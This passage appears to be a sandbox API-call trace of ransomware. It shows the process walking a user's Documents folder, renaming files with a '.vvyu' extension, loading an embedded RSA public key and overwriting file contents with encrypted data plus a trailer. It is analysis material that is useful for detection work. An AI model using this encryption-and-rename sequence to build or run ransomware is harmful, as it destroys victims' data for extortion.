lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.449] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.449] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.449] CloseHandle (hObject=0x568) returned 1 [0196.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0196.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0196.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0196.451] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\NxH6NL2Af5s5IGX.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\nxh6nl2af5s5igx.doc"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\NxH6NL2Af5s5IGX.doc.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\nxh6nl2af5s5igx.doc.vvyu")) returned 1 [0196.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.452] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0196.455] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc812f040, ftCreationTime.dwHighDateTime=0x1d89728, ftLastAccessTime.dwLowDateTime=0xa0012480, ftLastAccessTime.dwHighDateTime=0x1d89a45, ftLastWriteTime.dwLowDateTime=0xa0012480, ftLastWriteTime.dwHighDateTime=0x1d89a45, nFileSizeHigh=0x0, nFileSizeLow=0x195d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Qs2 hK9Y_.xlsx", cAlternateFileName="QS2HK9~1.XLS")) returned 1 [0196.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0196.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.456] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\Qs2 hK9Y_.xlsx") returned=".xlsx" [0196.456] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\Qs2 hK9Y_.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\qs2 hk9y_.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.457] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=6493) returned 1 [0196.457] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.459] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x1937, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.460] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.462] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.462] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x195d, lpOverlapped=0x0) returned 1 [0196.468] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.468] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.468] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.468] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0196.469] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.469] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.469] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.469] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.470] GetLastError () returned 0x0 [0196.470] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.470] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0196.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.470] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.470] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.470] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1960) returned 0x2ea79b0 [0196.471] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1800 [0196.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e40 [0196.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1848 [0196.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e58 [0196.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e88 [0196.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ee8 [0196.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ea0 [0196.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.472] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ee8 [0196.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0196.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ea0 [0196.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2e88 [0196.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0196.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0196.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0196.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0196.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.475] GetCurrentThreadId () returned 0x66c [0196.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5380 [0196.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.476] GetCurrentThreadId () returned 0x66c [0196.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ee8 [0196.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e88 [0196.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0196.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ea0 [0196.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e70 [0196.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f00 [0196.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0196.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ed0 [0196.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2eb8 [0196.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f18 [0196.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2eb8 [0196.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0196.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e88 [0196.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0196.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0196.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0196.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1848 | out: hHeap=0x620000) returned 1 [0196.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.488] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x1958, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x1958, lpOverlapped=0x0) returned 1 [0196.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.489] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x195d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.489] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, 